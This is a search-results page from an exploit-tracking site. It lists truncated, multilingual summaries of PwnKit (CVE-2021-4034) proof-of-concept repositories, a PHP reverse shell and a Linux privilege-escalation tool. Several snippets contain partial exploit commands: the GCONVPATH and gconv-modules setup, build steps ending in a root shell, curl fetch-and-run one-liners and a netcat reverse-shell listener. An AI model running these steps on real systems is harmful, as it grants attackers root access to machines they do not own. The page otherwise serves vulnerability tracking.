Lucene search
+L

117 matches found

Kitploit
Kitploit
added 2026/08/28 3:06 a.m.4 views

YAPS

YAPS - Y et A nother P HP S hell نعم، كما يكشف الاسم، هذه قشرة عكسية أخرى لـ PHP، واحدة أخرى من بين المئات المتاحة، ولكن مع بعض المزايا. إنها ملف PHP واحد يحتوي على جميع وظائفها ويمكنك التحكم بها عبر مستمع TCP بسيط مثل nc -lp 1337. في الإصدار الحالي 1.5، تدعم وظائفه الرئيسية أنظمة لينكس فقط، لكنن...

7.8CVSS7AI score0.94921EPSS
SaveExploits154References5
Kitploit
Kitploit
added 2026/08/28 3:06 a.m.7 views

pwnkit_safety_check

Что такое PwnKit PwnKit использует уязвимость в программе /usr/bin/pkexec с SUID-битом root, позволяя непривилегированным пользователям получить полные права root на системах Linux. Эта уязвимость существовала с 2009 года и была публично раскрыта в январе 2022 года. pwnkitsafetycheck.c PwnKit...

7.8CVSS6.8AI score0.94921EPSS
SaveExploits154
Kitploit
Kitploit
added 2026/08/28 2:39 a.m.3 views

ubuntu-privesc-lab

ubuntu-privesc-lab سير عمل كامل لاختبار الاختراق: تخمين بيانات الاعتماد Brute Force، الوصول عبر SSH وتصعيد الامتيازات CVE-2021-4034 نظرة عامة يُظهر هذا المشروع سير عمل كامل لاختبار الاختراق ضد جهاز افتراضي يعمل بنظام Ubuntu وعُرضة للثغرات. تتضمن سلسلة الهجوم الاستطلاع، تخمين بيانات الاعتماد Brute...

7.8CVSS6.8AI score0.94921EPSS
SaveExploits154References1
Kitploit
Kitploit
added 2026/08/28 2:29 a.m.3 views

-CVE-2021-4034

تقرير استغلال CVE-2021-4034 PwnKit ملخص التقييم الأمني الرسمي أدلة استغلال مُتحكم بها لـ CVE-2021-4034 مع توثيق التأثير وإرشادات المعالجة. بيانات التقرير الوصفية الحقل| القيمة ---|--- معرف CVE| CVE-2021-4034 اسم الثغرة| PwnKit المكون المتأثر| pkexec polkit النوع| تصعيد الصلاحيات المحلي الخطورة|...

7.8CVSS7.2AI score0.94921EPSS
SaveExploits154
Kitploit
Kitploit
added 2026/08/28 12:42 a.m.3 views

poppy

poppy : CVE-2021-4034 CVE-2021-4034 PoC , polkit 0.131 Uso Testado em Arch Linux Manjaro & Axyl OS root@kitploit: git clone https://github.com/tahaafarooq/poppy make ./poppy Exploit de criação de superusuário root@kitploit: bash -c "$curl -fsSL...

7.8CVSS6.8AI score0.94921EPSS
SaveExploits154
Kitploit
Kitploit
added 2026/08/28 12:17 a.m.3 views

cve-2021-4034

cve-2021-4034 mkdir -p 'GCONVPATH=.'; touch 'GCONVPATH=./pwnkit'; chmod a+x 'GCONVPATH=./pwnkit' mkdir -p pwnkit; echo 'module UTF-8// PWNKIT// pwnkit 2' pwnkit/gconv-modules echo...

7.8CVSS6.8AI score0.94921EPSS
SaveExploits154
Kitploit
Kitploit
added 2026/08/27 11:58 p.m.2 views

PwnKit

PwnKit Exploit autonomo per CVE-2021-4034 - Escalation locale dei privilegi di Pkexec Utilizzo Dovrebbe funzionare senza configurazioni aggiuntive sulle distribuzioni Linux vulnerabili basate su Ubuntu, Debian, Fedora e CentOS. root@kitploit: sh -c "$curl -fsSL...

7.8CVSS6.8AI score0.94921EPSS
SaveExploits154References1
Kitploit
Kitploit
added 2026/08/27 8:27 p.m.2 views

CVE-2021-4034

CVE-2021-4034 PoC für PwnKit: Lokale Rechteausweitungsschwachstelle in polkits pkexec in Python Verwendung root@kitploit: git clone https://github.com/rvizx/CVE-2021-4034 cd CVE-2021-4034 python3 cve-2021-4034-poc.py Hinweise C : https://github.com/arthepsy/CVE-2021-4034 Behebung root@kitploit:...

7.8CVSS6.8AI score0.94921EPSS
SaveExploits154References1
Kitploit
Kitploit
added 2026/08/27 8:23 p.m.2 views

PwnKit-CVE-2021-4034

PwnKit-CVE-2021-4034 PoC für PwnKit-CVE-2021-4034 - Pkexec lokale Rechteausweitung...

7.8CVSS6.8AI score0.94921EPSS
SaveExploits154
Kitploit
Kitploit
added 2026/08/27 6:37 p.m.2 views

pwnkit

CVE-2021-4034 Introduzione Questo è un exploit per la vulnerabilità CVE-2021-4034, nota anche come pwnkit, scoperta da Qualys. Utilizzo Compilazione root@kitploit: $ make oppure root@kitploit: $ gcc -o pwnkit.so -fPIC -shared pwnkit.c -Wl,-e,main Test root@kitploit: $ make test oppure...

7.8CVSS6.8AI score0.94921EPSS
SaveExploits154
Kitploit
Kitploit
added 2026/08/27 5:17 p.m.5 views

CVE-2021-4034

CVE-2021-4034 Eines Tages für den Polkit-Privilege-Escalation-Exploit Führen Sie einfach make, ./cve-2021-4034 aus und genießen Sie Ihre Root-Shell. Die originale Empfehlung der eigentlichen Autoren ist hier PoC Wenn der Exploit funktioniert, erhalten Sie sofort eine Root-Shell: root@kitploit:...

7.8CVSS6.8AI score0.94921EPSS
SaveExploits154
Kitploit
Kitploit
added 2026/08/27 3:16 p.m.3 views

CVE-2021-4034

CVE-2021-4034 root@kitploit: $ make cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c cc -Wall cve-2021-4034.c -o cve-2021-4034 echo "module UTF-8// PWNKIT// pwnkit 1" gconv-modules mkdir -p GCONVPATH=. cp /usr/bin/true GCONVPATH=./pwnkit.so:. $ ./cve-2021-4034 whoami root exit...

7.8CVSS6.8AI score0.94921EPSS
SaveExploits154
Kitploit
Kitploit
added 2026/08/27 3:05 p.m.3 views

CVE-2021-4034

CVE-2021-4034 Questa è una PoC per la Vulnerabilità di Escalation dei Privilegi Locali PwnKit scoperta da Qualys Security Team. Il Qualys Research Team ha scoperto una vulnerabilità di corruzione della memoria in pkexec di polkit, un programma SUID-root che è installato di default su ogni...

7.8CVSS6.8AI score0.94921EPSS
SaveExploits154
Kitploit
Kitploit
added 2026/08/27 2:29 p.m.3 views

CVE-2021-4034

CVE-2021-4034 PoC für PwnKit: Lokale Privilegienausweitungsschwachstelle in polkit's pkexec CVE-2021-4034 https://seclists.org/oss-sec/2022/q1/80...

7.8CVSS6.8AI score0.94921EPSS
SaveExploits154
Kitploit
Kitploit
added 2026/08/27 2:03 p.m.4 views

traitor

Traitor Sfrutta automaticamente i frutti a portata di mano per ottenere una shell di root. Elevazione dei privilegi Linux resa semplice! Traitor racchiude una serie di metodi per sfruttare configurazioni errate e vulnerabilità locali al fine di ottenere una shell di root: Quasi tutti i GTFOBins...

7.8CVSS7AI score0.89721EPSS
SaveExploits101References2
Kitploit
Kitploit
added 2026/08/27 9:46 a.m.2 views

CVE-2021-4034

CVE-2021-4034 Eine einfache PWNKIT-Datei, um dich zu root zu machen. | Nur für Bildungszwecke. Was ist das? Es ist ein vorgefertigtes und vorgezipptes PWNKIT. Warum? Ich arbeite an einem Skript AUTO-PWNKIT, um das Pwnkit zu automatisieren, und ich werde dieses Repos verwenden. AutoPwnkit-Tool...

7.8CVSS6.8AI score0.94921EPSS
SaveExploits154References2
Kitploit
Kitploit
added 2026/08/27 9:46 a.m.2 views

AutoPwnkit

AutoPwnkit Uno strumento per automatizzare l'exploit PWNKIT CVE-2021-4034 Dichiarazione Solo a scopo educativo | L'autore non è responsabile per eventuali danni Crediti AutoPwnkit - di x04000 Script originali - https://github.com/berdav/CVE-2021-4034...

7.8CVSS6.8AI score0.94921EPSS
SaveExploits154References1
Kitploit
Kitploit
added 2026/08/27 9:45 a.m.2 views

CVE-2021-4034

CVE-2021-4034 Offensichtlich nicht original. Habe es überarbeitet, um zu verstehen, was vor sich geht. Credits an https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt für das Finden der Schwachstelle! Andere PoCs, die mir geholfen haben, den Exploit zu verstehen:...

7.8CVSS6.8AI score0.94921EPSS
SaveExploits154References2
Kitploit
Kitploit
added 2026/08/27 9:39 a.m.2 views

CVE-2021-4034

Exploit CVE-2021-4034 Exploit de raiz para a vulnerabilidade PwnKit. Consulte o relatório original aqui. Use este exploit com permissão expressa dos proprietários do sistema alvo. Compilação Nenhuma dependência necessária além da libc. Basta executar make. Execução Executar sem opções executará o...

7.8CVSS6.9AI score0.94921EPSS
SaveExploits154
Kitploit
Kitploit
added 2026/08/27 9:25 a.m.2 views

CVE-2021-4034

CVE-2021-4034 https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt...

7.8CVSS6.8AI score0.94921EPSS
SaveExploits154
Rows per page
Query Builder